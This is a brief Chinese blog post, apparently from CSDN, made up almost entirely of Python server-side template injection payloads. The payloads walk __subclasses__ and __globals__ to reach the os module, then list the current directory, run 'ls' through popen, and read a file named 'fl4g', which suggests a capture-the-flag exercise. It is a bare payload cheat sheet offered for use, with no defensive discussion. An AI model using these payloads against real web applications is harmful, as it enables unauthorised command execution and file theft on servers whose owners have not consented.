ssti payload
作者:互联网
查看当前目录
{{[].__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
或
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
读取此文件
<type 'file'> :
{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}
或
<class 'site._Printer'> :
{{[].__class__.__mro__[1].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
标签:__,.__,globals,payload,ssti,__.__,subclasses,class 来源: https://blog.csdn.net/qq_45989120/article/details/120726998